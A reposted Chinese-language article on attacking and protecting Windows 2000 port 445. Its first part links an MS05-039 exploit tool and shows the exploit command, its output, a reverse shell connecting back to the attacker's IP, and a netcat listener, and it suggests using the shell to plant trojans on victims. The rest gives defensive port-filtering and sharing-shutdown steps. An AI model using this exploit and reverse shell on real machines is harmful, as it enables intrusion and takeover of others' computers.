445利用方法

轉載自：http://www.shangxueba.com/jingyan/390114.html

相關工具

ms05039：

http://down.51cto.com/data/612193       

C:\445>ms05039.exe192.168.0.13192.168.0.1112341

　　MS05-039WindowsPnPRemoteOverflowExploit

　　ConnectbackshellcodeEditionBysuperlone[EST]

　　TestedOnWindows2000PROSP4CN

　　[+]Tryingtoconnecttoremoteporton192.168.0.13:445...ESTABLISHED

　　[+]Makingnullsession...OK

　　[+]Tryingtobindpipe...OK

　　Tringtosendcraftedpacket...OK

　　[+]Exploitdone!Checkyourreverseshellon192.168.0.11:1234

　　C:\445>nc.exe-vv-l-p1234

　　listeningon[any]1234...

　　教會你445端口的***與防範：

　　445端口是一個譭譽參半的端口，有了它我們可以在局域網中輕鬆訪問各種共享文件夾或共享打印機，但也正是因爲有了它，***們纔有了可乘之機，他們能通過該端口偷偷共享你的硬盤，甚至會在悄無聲息中將你的硬盤格式化掉！我們所能做的就是想辦法不讓***有機可乘，封堵住445端口漏洞。簡單起見，本文中都以Windows2000爲例，對於WindowsXP，步驟基本類似。

　　第一步，我們需要做的是確定一臺存在445端口漏洞的主機。可以用掃描工具掃描得到！比如SUPERSCAN這個端口掃描工具。

　　第二步，假設現在我們已經得到一臺存在445端口漏洞的主機，那麼我們就可以利用瑞士***nc和溢出工具ms05039進行***：

　　F:\445>ms05039目標IP本地IP1234

　　。。。。。。

　　。。。。。。

　　F:\445>nc.exe-vv-l-p1234

　　。。。。。。

　　。。。。。。

　　成功的話，就會返回一個shell，然後就可以用我們常用的命令了。比如讓他去下載我們的***或上傳一個***給他，然後運行，這樣得到一隻肉雞了。

　　看了上面的這些，是不是覺得自己的電腦很危險？不用怕，下面我們就來解除這危險的445端口漏洞：

　　防範445端口漏洞的***方法：

　　1.端口排除法

　　這種方法利用了Windows2000系統的端口排除功能將來自於445端口的所有信息包全部禁止掉，讓大

　　惡人們無法接近你的主機，下面是這種方法的具體實現步驟：

　　打開Windows2000系統的開始菜單，選中設置項下面的網絡和撥號連接圖標，並用鼠標右鍵單擊之，從其後的快捷菜單中，單擊瀏覽命令；

　　在接着出現的窗口中，右擊Internet連接圖標，選中屬性選項，彈出Internet連接屬性窗口；

　　打開常規標籤頁面，將其中的Internet協議(TCP/IP)項選中，然後再單擊一下屬性按鈕，打開Internet協議(TCP/IP)屬性設置頁面；

　　繼續單擊該頁面中的高級按鈕，打開高級TCP/IP設置窗口，選中其中的選項標籤，並在該標籤頁面的可選的設置項中，將TCP/IP篩選選中，再單擊一下對應的屬性按鈕，打開TCP/IP篩選的設置口；

　　由於445端口屬於一種TCP端口，你可以在對應TCP端口的設置項處，將只允許項選中，激活下面的添加按鈕，單擊該按鈕，在其後打開的添加篩選器窗口中，將必須用到的幾個服務端口號碼，都添加進來，而將用不到的445端口號碼排除在外，設置完畢後，單擊確定按鈕，就可以讓設置生效了。

　　2.服務關閉法

　　考慮到文件夾或打印機共享服務纔會利用到445端口，因此直接將文件夾或打印機共享服務停止掉，同樣也能實現關閉445端口的目的，讓***無法破壞各種共享資源，下面是關閉文件夾或打印機共享服務的具體步驟：

　　打開Windows2000系統的開始菜單，選中設置項下面的網絡和撥號連接圖標，並用鼠標右鍵單擊之，從其後的快捷菜單中，單擊瀏覽命令；

　　在接着出現的窗口中，右擊Internet連接圖標，選中屬性選項，彈出Internet連接屬性窗口；

　　打開常規標籤頁面，並在此連接使用下列選定的組件列表框中，將Microsoft網絡的文件或打印機共享選項前面的勾號取消，如圖2所示。最後單擊確定按鈕，重新啓動系統，Internet上的大惡人們就沒有權利訪問到各種共享資源了。

　　當然，你也可以在不停止共享服務的條件下，剝奪大惡人們的共享訪問權利；利用本地安全設置中的用戶權利指派功能，指定Internet上的任何用戶都無權訪問本地主機，具體步驟爲：

　　在Windows2000系統的開始菜單中，依次單擊程序　管理工具　本地安全設置選項，接着展開安全設置　本地策略　用戶權利指派文件夾，在對應的右邊子窗口中選中拒絕從網絡訪問這臺計算機選項，並用鼠標左鍵雙擊之；

　　打開設置窗口後，單擊添加按鈕，從彈出的選擇用戶或組對話框中選中everyone選項，再單擊添加按鈕，最後單擊確定，這樣任何一位用戶都無法從網絡訪問到本地主機。